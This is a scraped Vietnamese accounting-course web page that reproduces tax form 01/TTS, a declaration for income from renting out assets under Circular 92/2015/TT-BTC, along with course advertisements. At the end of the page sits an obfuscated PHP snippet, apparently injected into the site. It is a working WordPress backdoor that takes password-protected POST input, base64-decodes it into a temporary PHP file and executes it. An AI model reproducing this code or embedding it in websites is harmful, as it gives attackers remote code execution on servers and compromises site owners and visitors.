1

Mẫu 01/TTS Tờ khai thuế cho thuê tài sản theo TT 92/2015/TT-BTC

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Mẫu 01/TTS Tờ khai thuế cho thuê tài sản đối với hoạt động cho thuê tài sản như: Cho thuê nhà, cho thuê xe ô tô…  Ban hành kèm theo Thông tư 92/2015/TT-BTC ban hành ngày 15/6/2015 của Bộ Tài Chính.

CỘNG HOÀ XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lập – Tự do – Hạnh phúc 

TỜ KHAI ĐỐI VỚI HOẠT ĐỘNG CHO THUÊ TÀI SẢN
(Áp dụng cho cá nhân có hoạt động cho thuê tài sản hoặc tổ chức khai thay)

[01] Kỳ tính thuế:  
Năm …
Kỳ thanh toán: từ ngày …/tháng…./năm… đến ngày …/tháng…/năm…
 
[02] Lần đầu:            [03] Bổ sung lần thứ:
[04]Người nộp thuế:………………………………..
           [05] Mã số thuế:
[06] Địa chỉ liên hệ: ……………………………………………..
[07] Điện thoại:………….[08] Fax:…… [09] Email:…..………..
[10] Số CMND (trường hợp cá nhân quốc tịch Việt Nam):……………..
[11] Hộ chiếu (trường hợp cá nhân không có quốc tịch Việt nam):……
[12] Tên đại lý thuế (nếu có):………………………………………
           [13] Mã số thuế:
[14] Địa chỉ: ………………………………………………………
[15] Quận/huyện: ………… [16] Tỉnh/thành phố: ……………………
[17] Điện thoại: …………..  [18] Fax: ……… [19] Email: ……………….
[20] Hợp đồng đại lý thuế: Số………..ngày……/……./…………….
[21] Văn bản uỷ quyền (nếu có): Số…ngày…thán…năm……
[22] Tổ chức nộp thuế thay (nếu có):……………..
           [23] Mã số thuế:
[24] Địa chỉ: ……………………………
[25] Điện thoại: ……..  [26] Fax: …….. [27] Email: ……………….

 
A. PHẦN CÁ NHÂN KÊ KHAI NGHĨA VỤ THUẾ

Đơn vị tính: Đồng Việt Nam
STT Chỉ tiêu Mã chỉ tiêu Số tiền
1 Tổng doanh thu phát sinh trong kỳ [28]
2 Tổng doanh thu tính thuế [29]
3 Tổng số thuế GTGT phải nộp [30]
4 Tổng số thuế TNCN phát sinh trong kỳ [31]
5 Doanh thu làm căn cứ tính giảm thuế [32]
6 Số thuế TNCN được giảm [33]
7 Tiền phạt, bồi thường mà bên cho thuê nhận được theo thoả thuận tại hợp đồng (nếu có) [34]
8 Tổng số thuế TNCN phải nộp từ tiền nhận bồi thường, phạt vi phạm hợp đồng (nếu có) [35]
9 Tổng số thuế TNCN phải nộp [36]=[31]-[33]+[35] [36]
(TNCN: Thu nhập cá nhân; GTGT: Giá trị gia tăng)

B.  PHẦN CƠ QUAN THUẾ GHI THÔNG TIN HỖ TRỢ NGƯỜI NỘP THUẾ THỰC HIỆN NGHĨA VỤ THUẾ 
Đề nghị Ngân hàng/Kho bạc Nhà nước [37]………………
trích tài khoản số [38]: ……(trường hợp nộp qua Ngân hàng)………….
hoặc thu tiền mặt để nộp NSNN vào KBNN …..(đồng cấp với cơ quan thuế quản lý)……. ………………………………………………………….
Cơ quan thuế quản lý khoản thu:……………………….

Tổng số thuế phải nộp NSNN:      ….. đồng. Trong đó:
– Số thuế GTGT (tiểu mục 1701): ……= [30] phần A …. đồng.
– Số thuế TNCN (tiểu mục 1014): ……= [36] phần A …. đồng.

Tôi cam đoan số liệu khai trên là đúng và chịu trách nhiệm trước pháp luật về những số liệu đã khai./.
 

NHÂN VIÊN ĐẠI LÝ THUẾ
Họ và tên: ……………
Chứng chỉ hành nghề số:………
……, ngày……… tháng……….. năm……….
NGƯỜI NỘP THUẾ hoặc
ĐẠI DIỆN HỢP PHÁP CỦA NGƯỜI NỘP THUẾ
(Ký, ghi rõ họ tên)
________________Chúc các bạn thành công!___________________

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}